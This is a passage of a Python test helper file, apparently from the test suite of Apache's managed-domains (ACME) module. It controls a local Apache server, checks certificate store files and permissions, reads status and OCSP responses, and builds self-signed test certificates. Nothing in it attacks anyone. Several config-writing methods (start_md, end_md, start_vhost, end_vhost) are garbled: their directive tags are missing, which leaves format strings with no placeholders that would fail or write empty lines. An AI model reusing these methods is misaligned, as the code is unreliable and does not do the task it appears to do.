os.path.join(TestEnv.STORE_DIR, \"ocsp\")\n print(\"clear ocsp store dir: %s\" % dir)\n if os.path.exists(dir):\n shutil.rmtree(dir, ignore_errors=True)\n\n @classmethod\n def authz_save( cls, name, content ) :\n dir = os.path.join(TestEnv.STORE_DIR, 'staging', name)\n os.makedirs(dir)\n open( os.path.join( dir, 'authz.json'), \"w\" ).write(content)\n\n @classmethod\n def path_store_json( cls ) : \n return os.path.join(TestEnv.STORE_DIR, 'md_store.json')\n\n @classmethod\n def path_account( cls, acct ) : \n return os.path.join(TestEnv.STORE_DIR, 'accounts', acct, 'account.json')\n\n @classmethod\n def path_account_key( cls, acct ) : \n return os.path.join(TestEnv.STORE_DIR, 'accounts', acct, 'account.pem')\n\n @classmethod\n def store_domains( cls ) :\n return os.path.join(TestEnv.STORE_DIR, 'domains')\n\n @classmethod\n def store_archives( cls ) :\n return os.path.join(TestEnv.STORE_DIR, 'archive')\n\n @classmethod\n def store_stagings( cls ) :\n return os.path.join(TestEnv.STORE_DIR, 'staging')\n\n @classmethod\n def store_challenges( cls ) :\n return os.path.join(TestEnv.STORE_DIR, 'challenges')\n \n @classmethod\n def store_domain_file( cls, domain, filename ) :\n return os.path.join(TestEnv.store_domains(), domain, filename)\n\n @classmethod\n def store_archived_file( cls, domain, version, filename ) :\n return os.path.join(TestEnv.store_archives(), \"%s.%d\" % (domain, version), filename)\n \n @classmethod\n def store_staged_file( cls, domain, filename ) :\n return os.path.join(TestEnv.store_stagings(), domain, filename)\n \n @classmethod\n def path_fallback_cert( cls, domain ) :\n return os.path.join(TestEnv.STORE_DIR, 'domains', domain, 'fallback-cert.pem')\n\n @classmethod\n def path_job( cls, domain ) :\n return os.path.join( TestEnv.STORE_DIR, 'staging', domain, 'job.json' )\n\n @classmethod\n def replace_store( cls, src):\n shutil.rmtree(TestEnv.STORE_DIR, ignore_errors=False)\n shutil.copytree(src, TestEnv.STORE_DIR)\n\n @classmethod\n def list_accounts( cls ) :\n return os.listdir( os.path.join( TestEnv.STORE_DIR, 'accounts' ) )\n \n @classmethod\n def check_md(cls, domain, md=None, state=-1, ca=None, protocol=None, agreement=None, contacts=None):\n if isinstance(domain, list):\n domains = domain\n domain = domains[0]\n if md:\n domain = md\n path = cls.store_domain_file(domain, 'md.json')\n with open( path ) as f:\n md = json.load(f)\n assert md\n if domains:\n assert md['domains'] == domains\n if state >= 0:\n assert md['state'] == state\n if ca:\n assert md['ca']['url'] == ca\n if protocol:\n assert md['ca']['proto'] == protocol\n if agreement:\n assert md['ca']['agreement'] == agreement\n if contacts:\n assert md['contacts'] == contacts\n\n\n @classmethod\n def check_md_complete(cls, domain):\n md = cls.get_md_status(domain)\n assert md\n assert md['state'] == TestEnv.MD_S_COMPLETE\n assert os.path.isfile( TestEnv.store_domain_file(domain, 'privkey.pem') )\n assert os.path.isfile( TestEnv.store_domain_file(domain, 'pubcert.pem') )\n\n @classmethod\n def check_md_credentials(cls, domain):\n if isinstance(domain, list):\n domains = domain\n domain = domains[0]\n # check private key, validate certificate, etc\n CertUtil.validate_privkey( cls.store_domain_file(domain, 'privkey.pem') )\n cert = CertUtil( cls.store_domain_file(domain, 'pubcert.pem') )\n cert.validate_cert_matches_priv_key( cls.store_domain_file(domain, 'privkey.pem') )\n # check SANs and CN\n assert cert.get_cn() == domain\n # compare lists twice in opposite directions: SAN may not respect ordering\n sanList = list(cert.get_san_list())\n assert len(sanList) == len(domains)\n assert set(sanList).issubset(domains)\n assert set(domains).issubset(sanList)\n # check valid dates interval\n notBefore = cert.get_not_before()\n notAfter = cert.get_not_after()\n assert notBefore < datetime.now(notBefore.tzinfo)\n assert notAfter > datetime.now(notAfter.tzinfo)\n\n # --------- control apache ---------\n\n @classmethod\n def install_test_conf( cls, conf=None) :\n root_conf_src = os.path.join(\"conf\", \"httpd.conf\")\n copyfile(root_conf_src, cls.APACHE_CONF)\n\n if conf is None:\n conf_src = os.path.join(\"conf\", \"test.conf\")\n elif os.path.isabs(conf):\n conf_src = conf\n else:\n conf_src = os.path.join(cls.APACHE_CONF_SRC, conf + \".conf\")\n copyfile(conf_src, cls.APACHE_TEST_CONF)\n\n @classmethod\n def apachectl( cls, cmd, conf=None, check_live=True ) :\n if conf:\n cls.install_test_conf(conf)\n args = [cls.APACHECTL, \"-d\", cls.WEBROOT, \"-k\", cmd]\n cls.apachectl_stderr = \"\"\n p = subprocess.run(args, capture_output=True, text=True)\n cls.apachectl_stderr = p.stderr\n rv = p.returncode\n if rv == 0:\n if check_live:\n rv = 0 if cls.is_live(cls.HTTPD_CHECK_URL, 10) else -1\n else:\n rv = 0 if cls.is_dead(cls.HTTPD_CHECK_URL, 10) else -1\n print(\"waited for a apache.is_dead, rv=%d\" % rv)\n return rv\n\n @classmethod\n def apache_restart( cls ) :\n return cls.apachectl( \"graceful\" )\n \n @classmethod\n def apache_start( cls ) :\n return cls.apachectl( \"start\" )\n\n @classmethod\n def apache_stop( cls ) :\n return cls.apachectl( \"stop\", check_live=False )\n\n @classmethod\n def apache_fail( cls ) :\n rv = cls.apachectl( \"graceful\", check_live=False )\n if rv != 0:\n print(\"check, if dead: \" + cls.HTTPD_CHECK_URL)\n return 0 if cls.is_dead(cls.HTTPD_CHECK_URL, 5) else -1\n return rv\n \n @classmethod\n def httpd_error_log_clear( cls ):\n cls.apachectl_stderr = \"\"\n if os.path.isfile(cls.ERROR_LOG):\n os.remove(cls.ERROR_LOG)\n\n RE_MD_RESET = re.compile('.*\\[md:info\\].*initializing\\.\\.\\.')\n RE_MD_ERROR = re.compile('.*\\[md:error\\].*')\n RE_MD_WARN = re.compile('.*\\[md:warn\\].*')\n\n @classmethod\n def httpd_error_log_count( cls ):\n ecount = 0\n wcount = 0\n \n if os.path.isfile(cls.ERROR_LOG):\n fin = open(cls.ERROR_LOG)\n for line in fin:\n m = cls.RE_MD_ERROR.match(line)\n if m:\n ecount += 1\n continue\n m = cls.RE_MD_WARN.match(line)\n if m:\n wcount += 1\n continue\n m = cls.RE_MD_RESET.match(line)\n if m:\n ecount = 0\n wcount = 0\n return (ecount, wcount)\n\n @classmethod\n def httpd_error_log_scan( cls, regex ):\n if not os.path.isfile(cls.ERROR_LOG):\n return False\n fin = open(cls.ERROR_LOG)\n for line in fin:\n if regex.match(line):\n return True\n return False\n\n\n # --------- check utilities ---------\n\n @classmethod\n def check_json_contains(cls, actual, expected):\n # write all expected key:value bindings to a copy of the actual data ... \n # ... assert it stays unchanged \n testJson = copy.deepcopy(actual)\n testJson.update(expected)\n assert actual == testJson\n\n @classmethod\n def check_file_access(cls, path, expMask):\n actualMask = os.lstat(path).st_mode & 0o777\n assert oct(actualMask) == oct(expMask)\n\n @classmethod\n def check_dir_empty(cls, path):\n assert os.listdir(path) == []\n\n @classmethod\n def getStatus(cls, domain, path, useHTTPS=True):\n result = cls.get_meta(domain, path, useHTTPS)\n return result['http_status']\n\n @classmethod\n def get_cert(cls, domain):\n return CertUtil.load_server_cert(TestEnv.HTTPD_HOST, TestEnv.HTTPS_PORT, domain)\n\n @classmethod\n def get_meta(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-D\", \"-\", \"-k\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n # read status\n m = re.match(\"HTTP/\\\\d(\\\\.\\\\d)? +(\\\\d\\\\d\\\\d) .*\", result['stdout'])\n assert m\n result['http_status'] = int(m.group(2))\n # collect response headers\n h = {}\n for m in re.findall(\"^(\\\\S+): (.*)\\n\", result['stdout'], re.M) :\n h[ m[0] ] = m[1]\n result['http_headers'] = h\n return result\n\n @classmethod\n def get_content(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-sk\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n return result['stdout']\n\n @classmethod\n def get_json_content(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-k\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n return result['jout'] if 'jout' in result else None\n\n @classmethod\n def get_certificate_status(cls, domain, timeout=60):\n stat = TestEnv.get_json_content(domain, \"/.httpd/certificate-status\")\n return stat\n\n @classmethod\n def get_md_status(cls, domain, timeout=60):\n stat = TestEnv.get_json_content(\"localhost\", \"/md-status/%s\" % (domain))\n return stat\n\n @classmethod\n def get_server_status(cls, timeout=60):\n return TestEnv.get_content(\"localhost\", \"/server-status/\")\n\n @classmethod\n def await_completion(cls, names, must_renew=False, restart=True, timeout=60):\n try_until = time.time() + timeout\n renewals = {}\n while len(names) > 0:\n if time.time() >= try_until:\n return False\n for name in names:\n md = TestEnv.get_md_status(name, timeout)\n if md == None:\n print(\"not managed by md: %s\" % (name))\n return False\n\n if 'renewal' in md:\n renewal = md['renewal']\n renewals[name] = True\n if 'finished' in renewal and renewal['finished'] == True:\n if (not must_renew) or (name in renewals):\n names.remove(name) \n \n if len(names) != 0:\n time.sleep(0.1)\n if restart:\n time.sleep(0.1)\n return cls.apache_restart() == 0\n return True\n\n @classmethod\n def is_renewing(cls, name, timeout=60):\n stat = TestEnv.get_certificate_status(name, timeout)\n return 'renewal' in stat\n\n @classmethod\n def await_renewal(cls, names, timeout=60):\n try_until = time.time() + timeout\n while len(names) > 0:\n if time.time() >= try_until:\n return False\n allChanged = True\n for name in names:\n md = TestEnv.get_md_status(name, timeout)\n if md == None:\n print(\"not managed by md: %s\" % (name))\n return False\n\n if 'renewal' in md:\n names.remove(name)\n\n if len(names) != 0:\n time.sleep(0.1)\n return True\n\n @classmethod\n def await_error(cls, domain, timeout=60):\n try_until = time.time() + timeout\n while True:\n if time.time() >= try_until:\n return False\n md = cls.get_md_status(domain)\n if md:\n if md['state'] == TestEnv.MD_S_ERROR:\n return md\n if 'renewal' in md and 'errors' in md['renewal'] and md['renewal']['errors'] > 0:\n return md\n time.sleep(0.1)\n\n @classmethod\n def check_file_permissions( cls, domain ):\n md = cls.a2md([ \"list\", domain ])['jout']['output'][0]\n assert md\n acct = md['ca']['account']\n assert acct\n cls.check_file_access( cls.path_store_json(), 0o600 )\n # domains\n cls.check_file_access( cls.store_domains(), 0o700 )\n cls.check_file_access( os.path.join( cls.store_domains(), domain ), 0o700 )\n cls.check_file_access( cls.store_domain_file( domain, 'privkey.pem' ), 0o600 )\n cls.check_file_access( cls.store_domain_file( domain, 'pubcert.pem' ), 0o600 )\n cls.check_file_access( cls.store_domain_file( domain, 'md.json' ), 0o600 )\n # archive\n cls.check_file_access( cls.store_archived_file( domain, 1, 'md.json' ), 0o600 )\n # accounts\n cls.check_file_access( os.path.join( cls.STORE_DIR, 'accounts' ), 0o755 )\n cls.check_file_access( os.path.join( cls.STORE_DIR, 'accounts', acct ), 0o755 )\n cls.check_file_access( cls.path_account( acct ), 0o644 )\n cls.check_file_access( cls.path_account_key( acct ), 0o644 )\n # staging\n cls.check_file_access( cls.store_stagings(), 0o755 )\n\n @classmethod\n def get_ocsp_status( cls, domain ):\n stat = {}\n r = TestEnv.run( [ \"openssl\", \"s_client\", \"-status\", \n \"-connect\", \"%s:%s\" % (TestEnv.HTTPD_HOST, TestEnv.HTTPS_PORT),\n \"-CAfile\", \"gen/ca.pem\", \n \"-servername\", domain,\n \"-showcerts\"\n ] )\n ocsp_regex = re.compile(r'OCSP response: +([^=\\n]+)\\n')\n matches = ocsp_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['ocsp'] = m.group(1)\n if not 'ocsp' in stat:\n ocsp_regex = re.compile(r'OCSP Response Status:\\s*(.+)')\n matches = ocsp_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['ocsp'] = m.group(1)\n verify_regex = re.compile(r'Verify return code:\\s*(.+)')\n matches = verify_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['verify'] = m.group(1)\n return stat\n\n @classmethod\n def await_ocsp_status( cls, domain, timeout=60 ):\n try_until = time.time() + timeout\n while True:\n if time.time() >= try_until:\n return False\n stat = cls.get_ocsp_status(domain)\n if 'ocsp' in stat and stat['ocsp'] != \"no response sent\":\n return stat\n time.sleep(0.1)\n \n# -----------------------------------------------\n# --\n# -- dynamic httpd configuration\n# --\n\nclass HttpdConf(object):\n # Utility class for creating Apache httpd test configurations\n\n def __init__(self, name=\"test.conf\", local=True, text=None):\n self.path = os.path.join(TestEnv.GEN_DIR, name)\n if os.path.isfile(self.path):\n os.remove(self.path)\n if local:\n open(self.path, \"a\").write((\n \"MDCertificateAuthority %s\\n\"\n \"MDCertificateAgreement %s\\n\") % \n (TestEnv.ACME_URL, 'accepted')\n );\n if text:\n open(self.path, \"a\").write(text + \"\\n\")\n\n def clear(self):\n if os.path.isfile(self.path):\n os.remove(self.path)\n\n def _add_line(self, line):\n open(self.path, \"a\").write(line + \"\\n\")\n\n def add_line(self, line):\n self._add_line(line)\n\n def add_drive_mode(self, mode):\n self._add_line(\" MDRenewMode %s\\n\" % mode)\n\n def add_renew_window(self, window):\n self._add_line(\" MDRenewWindow %s\\n\" % window)\n\n def add_private_key(self, keyType, keyParams):\n self._add_line(\" MDPrivateKeys %s %s\\n\" % (keyType, \" \".join(map(lambda p: str(p), keyParams))) )\n\n def add_admin(self, email):\n self._add_line(\" ServerAdmin mailto:%s\\n\\n\" % email)\n\n def add_md(self, domains):\n self._add_line(\" MDomain %s\\n\\n\" % \" \".join(domains))\n\n def start_md(self, domains):\n self._add_line(\" \\n\" % \" \".join(domains))\n \n def start_md2(self, domains):\n self._add_line(\" \\n\" % \" \".join(domains))\n\n def end_md(self):\n self._add_line(\" \\n\")\n\n def end_md2(self):\n self._add_line(\" \\n\")\n\n def add_must_staple(self, mode):\n self._add_line(\" MDMustStaple %s\\n\" % mode)\n\n def add_ca_challenges(self, type_list):\n self._add_line(\" MDCAChallenges %s\\n\" % \" \".join(type_list))\n\n def add_http_proxy(self, url):\n self._add_line(\" MDHttpProxy %s\\n\" % url)\n\n def add_require_ssl(self, mode):\n self._add_line(\" MDRequireHttps %s\\n\" % mode)\n\n def add_notify_cmd(self, cmd):\n self._add_line(\" MDNotifyCmd %s\\n\" % cmd)\n\n def add_message_cmd(self, cmd):\n self._add_line(\" MDMessageCmd %s\\n\" % cmd)\n\n def add_dns01_cmd(self, cmd):\n self._add_line(\" MDChallengeDns01 %s\\n\" % cmd)\n\n def add_vhost(self, domains, port=None, docRoot=\"htdocs\"):\n self.start_vhost(domains, port=port, docRoot=docRoot)\n self.end_vhost()\n\n def start_vhost(self, domains, port=None, docRoot=\"htdocs\"):\n if not isinstance(domains, list):\n domains = [domains]\n if not port:\n port = TestEnv.HTTPS_PORT \n f = open(self.path, \"a\") \n f.write(\"\\n\" % port)\n f.write(\" ServerName %s\\n\" % domains[0])\n for alias in domains[1:]:\n f.write(\" ServerAlias %s\\n\" % alias )\n f.write(\" DocumentRoot %s\\n\\n\" % docRoot)\n if TestEnv.HTTPS_PORT == port:\n f.write(\" SSLEngine on\\n\")\n \n def end_vhost(self):\n self._add_line(\"\\n\\n\")\n\n def install(self):\n TestEnv.install_test_conf(self.path)\n\n# -----------------------------------------------\n# --\n# -- certificate handling\n# --\n\nclass CertUtil(object):\n # Utility class for inspecting certificates in test cases\n # Uses PyOpenSSL: https://pyopenssl.org/en/stable/index.html\n\n @classmethod\n def create_self_signed_cert( cls, nameList, validDays, serial=1000, path=None ):\n domain = nameList[0]\n ddir = path if path else os.path.join(TestEnv.store_domains(), domain)\n if not os.path.exists(ddir):\n os.makedirs(ddir)\n\n cert_file = os.path.join(ddir, 'pubcert.pem')\n pkey_file = os.path.join(ddir, 'privkey.pem')\n # create a key pair\n if os.path.exists(pkey_file):\n key_buffer = open(pkey_file, 'rt').read()\n k = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_buffer)\n else:\n k = OpenSSL.crypto.PKey()\n k.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)\n\n # create a self-signed cert\n cert = OpenSSL.crypto.X509()\n cert.get_subject().C = \"DE\"\n cert.get_subject().ST = \"NRW\"\n cert.get_subject().L = \"Muenster\"\n cert.get_subject().O = \"greenbytes GmbH\"\n cert.get_subject().CN = domain\n cert.set_serial_number(serial)\n cert.gmtime_adj_notBefore( validDays[\"notBefore\"] * SEC_PER_DAY)\n cert.gmtime_adj_notAfter( validDays[\"notAfter\"] * SEC_PER_DAY)\n cert.set_issuer(cert.get_subject())\n\n cert.add_extensions([ OpenSSL.crypto.X509Extension(\n b\"subjectAltName\", False, b\", \".join( map(lambda n: b\"DNS:\" + n.encode(), nameList) )\n ) ])\n cert.set_pubkey(k)\n cert.sign(k, 'sha1')\n\n open(cert_file, \"wt\").write(\n OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, cert).decode('utf-8'))\n open(pkey_file, \"wt\").write(\n OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, k).decode('utf-8'))\n\n @classmethod\n def load_server_cert( cls, hostIP, hostPort, hostName ):\n ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection = OpenSSL.SSL.Connection(ctx, s)\n connection.connect((hostIP, int(hostPort)))\n connection.setblocking(1)\n connection.set_tlsext_host_name(hostName.encode('utf-8'))\n connection.do_handshake()\n peer_cert = connection.get_peer_certificate()\n return CertUtil( None, cert=peer_cert )\n\n\n def __init__(self, cert_path, cert=None):\n if cert_path is not None:\n self.cert_path = cert_path\n # load certificate and private key\n if cert_path.startswith(\"http\"):\n cert_data = TestEnv.get_plain(cert_path, 1)\n else:\n cert_data = CertUtil._load_binary_file(cert_path)\n\n for file_type in (OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1):\n try:\n self.cert = OpenSSL.crypto.load_certificate(file_type, cert_data)\n except Exception as error:\n self.error = error\n if cert is not None:\n self.cert = cert\n\n if self.cert is None:\n raise self.error\n\n def get_issuer(self):\n return self.cert.get_issuer()\n\n def get_serial(self):\n return (\"%lx\" % (self.cert.get_serial_number())).upper()\n\n def get_not_before(self):\n tsp = self.cert.get_notBefore()\n return self._parse_tsp(tsp)\n\n def get_not_after(self):\n tsp = self.cert.get_notAfter()\n return self._parse_tsp(tsp)\n\n def get_cn(self):\n return self.cert.get_subject().CN\n\n def get_key_length(self):\n return self.cert.get_pubkey().bits()\n\n def get_san_list(self):\n text = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_TEXT, self.cert).decode(\"utf-8\")\n m = re.search(r\"X509v3 Subject Alternative Name:\\s*(.*)\", text)\n sans_list = []\n if m:\n sans_list = m.group(1).split(\",\")\n def _strip_prefix(s): \n return s.split(\":\")[1] if s.strip().startswith(\"DNS:\") else s.strip()\n return list(map(_strip_prefix, sans_list))\n\n def get_must_staple(self):\n text = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_TEXT, self.cert).decode(\"utf-8\")\n m = re.search(r\"1.3.6.1.5.5.7.1.24:\\s*\\n\\s*0....\", text)\n if not m:\n # Newer openssl versions print this differently\n m = re.search(r\"TLS Feature:\\s*\\n\\s*status_request\\s*\\n\", text)\n return m != None\n\n @classmethod\n def validate_privkey(cls, privkey_path, passphrase=None):\n privkey_data = cls._load_binary_file(privkey_path)\n privkey = None\n if passphrase:\n privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data, passphrase)\n else:\n privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data)\n return privkey.check()\n\n def validate_cert_matches_priv_key(self, privkey_path):\n # Verifies that the private key and cert match.\n privkey_data = CertUtil._load_binary_file(privkey_path)\n privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data)\n context = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)\n context.use_privatekey(privkey)\n context.use_certificate(self.cert)\n context.check_privatekey()\n\n # --------- _utils_ ---------\n\n def astr(self, s):\n return s.decode('utf-8')\n \n def _parse_tsp(self, tsp):\n # timestampss returned by PyOpenSSL are bytes\n # parse date and time part\n s = (\"%s-%s-%s %s:%s:%s\" % (self.astr(tsp[0:4]), self.astr(tsp[4:6]), self.astr(tsp[6:8]), \n self.astr(tsp[8:10]), self.astr(tsp[10:12]), self.astr(tsp[12:14])))\n timestamp = datetime.strptime(s, '%Y-%m-%d %H:%M:%S')\n # adjust timezone\n tz_h, tz_m = 0, 0\n m = re.match(r\"([+\\-]\\d{2})(\\d{2})\", self.astr(tsp[14:]))\n if m:\n tz_h, tz_m = int(m.group(1)), int(m.group(2)) if tz_h > 0 else -1 * int(m.group(2))\n return timestamp.replace(tzinfo = self.FixedOffset(60 * tz_h + tz_m))\n\n @classmethod\n def _load_binary_file(cls, path):\n with open(path, mode=\"rb\")\t as file:\n return file.read()\n\n class FixedOffset(tzinfo):\n\n def __init__(self, offset):\n self.__offset = timedelta(minutes = offset)\n\n def utcoffset(self, dt):\n return self.__offset\n\n def tzname(self, dt):\n return None\n\n def dst(self, dt):\n return timedelta(0)\n","sub_path":"test/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":35067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}